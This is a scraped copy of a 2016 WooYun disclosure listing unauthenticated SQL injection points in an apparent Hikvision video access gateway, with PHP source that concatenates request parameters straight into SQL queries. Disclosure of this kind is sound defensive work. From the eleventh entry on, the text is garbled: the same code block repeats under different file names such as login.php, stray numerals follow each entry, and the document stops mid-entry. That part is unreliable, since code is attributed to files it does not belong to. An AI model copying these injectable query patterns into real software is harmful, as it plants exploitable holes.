海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

admin
admin
admin
139544
文章
114
评论
2017年4月22日15:55:53评论977 views字数 241阅读0分48秒阅读模式
摘要

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-09: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

漏洞概要 关注数(26) 关注此漏洞

缺陷编号: WooYun-2016-180213

漏洞标题: 海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等) 海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

相关厂商: 海康威视

漏洞作者: YY-2012

提交时间: 2016-03-02 19:54

公开时间: 2016-06-04 10:00

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷/边界绕过 逻辑错误

4人收藏

漏洞详情

披露状态:

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

rt

详细说明:

第一处注入:/userInfo/userInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  include('roleInfoClass.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['userId']);
  $userId = "";
  $name = "";
  $password = "******";
  $realName = "";
  $phone = "";
  $eMail = "";
  $roleId = "";
  $unitCode = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from user_info where userId ='.$_GET['userId']);
   while ($row = $dbQuery->fetchArray($re)){
    $userId = $row['userId'];
    $name = $row['name'];
    //$password = $row['password'];
    $realName = $row['realName'];
    $phone = $row['phone'];
    $eMail = $row['eMail'];
    $roleId = $row['roleId'];
    $unitCode= $row['unitCode'];

第二处注入:/userInfo/roleInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

第三处注入:/data/fetchRoleTreeJson.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

第四处注入:/deviceConfig/configDeviceInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

第五处注入:/transformServer/serverConfigInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['transId']);
  $transId = "";
  $name = "";
  $transIp = "";
  $transPort = "";
  $transMax = "";
  $transType = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from transform_server_info where transform_server_id ='.$_GET['transId']);

第六处注入:/cameraConfig/transferInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $id = $_GET['id'];
  $src_audio_encode = "-1";
  $src_video_encode = "-1";
  $src_standard = "0";
  $src_stream_type = "0";
  $src_transform = "-1";
  $src_image_size = "1";
  $dst_audio_encode = "2";
  $dst_video_encode = "1";
  $dst_stream_type = "0";
  $dst_transform = "2";
  $dst_bitrate_type = "1";
  $dst_resolution = "3";
  $dst_video_bitrate = "19";
  $dst_framerate = "-1";
  $dst_interval_BPframe = "2";
  $dst_interval_Iframe = "30";
  $dst_pic_quality = "0";
  $transform_server_id = "";
  
  $re = $dbQuery->query('select * from camera_info where is_transform=1 and id ='.$id);
  while ($row = $dbQuery->fetchArray($re)){

第七处注入:/data/deviceAndCameraListData.php

code 区域 
include('../common/connDb.php');
   include('../common/unitCode.php');
   $dbQuery = new DataBaseQuery();
   $page=$_POST['page']; 
   $rows=$_POST['rows'];
   $sort=$_POST['sort'];
   $order=$_POST['order'];
   $start=($page -1)*$rows;
   $name=@$_POST['name'];
   $organize=@$_POST['organize'];
   $group=@$_POST['group'];
   $configFlag=@$_POST['configFlag'];
   $type=@$_GET['type'];
   $deviceIndexCode = @$_GET['deviceIndexCode'];
   $deviceId = @$_GET['deviceId'];
   $show = @$_GET['show'];
   if($type =="device"){
    $whereStr="";
    if($name != ""){
     if($name=="." || $name=="%" || $name=="_"){
      $name ="[".$name."]";
     }
     $whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
    }
    if($organize != ""){
     if($organize =="0"){ //如果是主控制中心则查询全部
     }else{
      if(strlen($organize)==8){//如果是派出所级别
       $whereStr =" and d.indexcode like '".$organize."%'";
      }else{
       $qxCode = substr($organize,4,2);
       $shiCode = substr($organize,2,2);
       $shengCode = substr($organize,0,2);
       if($shiCode=="00" && $qxCode=="00"){  //如果是省
        $whereStr =" and d.indexcode like '".$shengCode."%'";
       }else if($shiCode !="00" && $qxCode=="00"){  //如果是市
        $whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
       }else{
        $whereStr =" and d.indexcode like '".$organize."%'";
       }
      }
      
     } 
    }
 
    if($group != ""){
     if($group=="-1"){
     }else{
      $whereStr =" and d.group_id =".$group;
     } 
    }
 
    $str="";
    if($configFlag == "1"){
     $str =" and (c.is_transform is null or c.is_transform=0)";
    }else if($configFlag == "2"){
     $str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
    }
    $re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
    $jsonArray = array();
    
    
    $count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
    while ($row = $dbQuery->fetchArray($re)){
     $pNode = new TreeNode();

第8处注入:/data/deviceTypeData.php

code 区域 
<?php 
   include('../common/connDb.php');
   $dbQuery = new DataBaseQuery();
   $page=$_POST['page']; 
   $rows=$_POST['rows'];
   $start=($page -1)*$rows;
   $re = $dbQuery->query('select * from device_type_info limit '.$start.','.$rows);
   $count = $dbQuery->querySingle('select count(*) from device_type_info');
   $jsonStr ="";
   while ($row = $dbQuery->fetchArray($re)){
    $jsonStr = $jsonStr.json_encode($row).",";
   }
   if($jsonStr !=""){
    $jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
   }
   $str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
   $dbQuery->closeDb();
   echo ($str);
 ?>

第九处注入:/data/checkIsExist.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $object=$_POST['object'];
  if($object=="userInfo"){  //如果是校验用户名称
   $name=$_POST['name'];
   $userId=$_POST['userId'];
   checkUserName($dbQuery,$name,$userId);
  }else if($object=="roleInfo"){
   $name=$_POST['name'];
   $roleId=$_POST['roleId'];
   checkRoleName($dbQuery,$name,$roleId);
  }else if($object=="password"){
   $name=$_POST['name'];
   $password=$_POST['password'];
   checkPassword($dbQuery,$name,$password);
  }else if($object=="deviceGroup"){  //如果是校验用户名称
   $name=$_POST['name'];
   $groupId=$_POST['groupId'];
   checkGroupName($dbQuery,$name,$groupId);
  }
 
  function checkUserName($dbQuery,$name,$userId){
   $count = 0;
   if($userId ==""){
    $count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'"');
   }else{
    $count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'" and userId<>'.$userId);
   } 
   echo $count;
   $dbQuery->closeDb();
  }
 
  function checkRoleName($dbQuery,$name,$roleId){
   $count = 0;
   if($roleId ==""){
    $count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'"');
   }else{
    $count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'" and roleId<>'.$roleId);
   } 
   echo $count;
   $dbQuery->closeDb();
  }
 
  function checkPassword($dbQuery,$name,$password){
   $oldPassword = $dbQuery->querySingle('select password from user_info where name="'.$name.'"');
   if($password ==$oldPassword){
    echo 0;
   }else{
    echo 1;
   }
   $dbQuery->closeDb();
  }
 
  function checkGroupName($dbQuery,$name,$groupId){
   $count = 0;
   if($groupId ==""){
    $count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'"');
   }else{
    $count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'" and id<>'.$groupId);
   } 
   echo $count;
   $dbQuery->closeDb();
  }
 ?>

第十处注入:/data/fetchIoInfoData.php

code 区域 
<?php
  include('../common/connDb.php');
  include('../common/unitCode.php');
  $dbQuery = new DataBaseQuery();
  $page=$_POST['page'];
  $rows=$_POST['rows'];
  $sort=$_POST['sort'];
  $order=$_POST['order'];
  $start=($page -1)*$rows;
  $organize=@$_POST['organize'];
  $group=@$_POST['group'];
  $configFlag=@$_POST['configFlag'];
  
  $re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,d.indexcode devIndexCode,d.type_code typeCode, c.globe_num from io_info c,device_info d where c.device_indexcode=d.indexcode order by c.id '.$order.' limit '.$start.','.$rows);
  $count = $dbQuery->querySingle('select count(*) from io_info c,device_info d where c.device_indexcode=d.indexcode');
  $jsonStr ="";
  while ($row = $dbQuery->fetchArray($re)){
   $jsonStr = $jsonStr.json_encode($row).",";
  }
  if($jsonStr !=""){
   $jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
  }
  $str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
  $dbQuery->closeDb();
  echo ($str);
 ?>

第十一处:/data/saveDeviceType.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

0

第十二处:/data/saveDecodeServer.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

1

第十三处:/data/fetchGroup.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

2

第十四处:/data/login.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

3

第十五处:/data/transferCamera.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

4

第十六处:/data/modifyPassword.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

5

第十七处:/data/fetchDeviceByGroupId.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

6

第十八处:/data/deleteDeviceInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

7

第十九处:/data/modifyDeviceInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

8

第二十处:/data/decodeServerData.php

code 区域 
<?php
  include('../common/connDb.php');
  $dbQuery = new DataBaseQuery();
  $isEmpty = empty($_GET['roleId']);
  $roleId = "";
  $name = "";
  $description = "";
  $menuIds = "";
  if(!$isEmpty){
   $re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
   while ($row = $dbQuery->fetchArray($re)){
    $roleId = $row['roleId'];
    $name = $row['name'];
    $description = $row['description'];
    $menuIds = $row['menuIds'];
   }
  }

9

第二十一处:/data/userInfoData.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

0

第二十二处:/data/checkDevice.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

1

第二十三处:/data/deviceListData.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

2

第二十四处:/data/saveUserInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

3

第二十五处:/data/fetchCameraInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

4

第二十六处:/data/fetchDeviceType.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
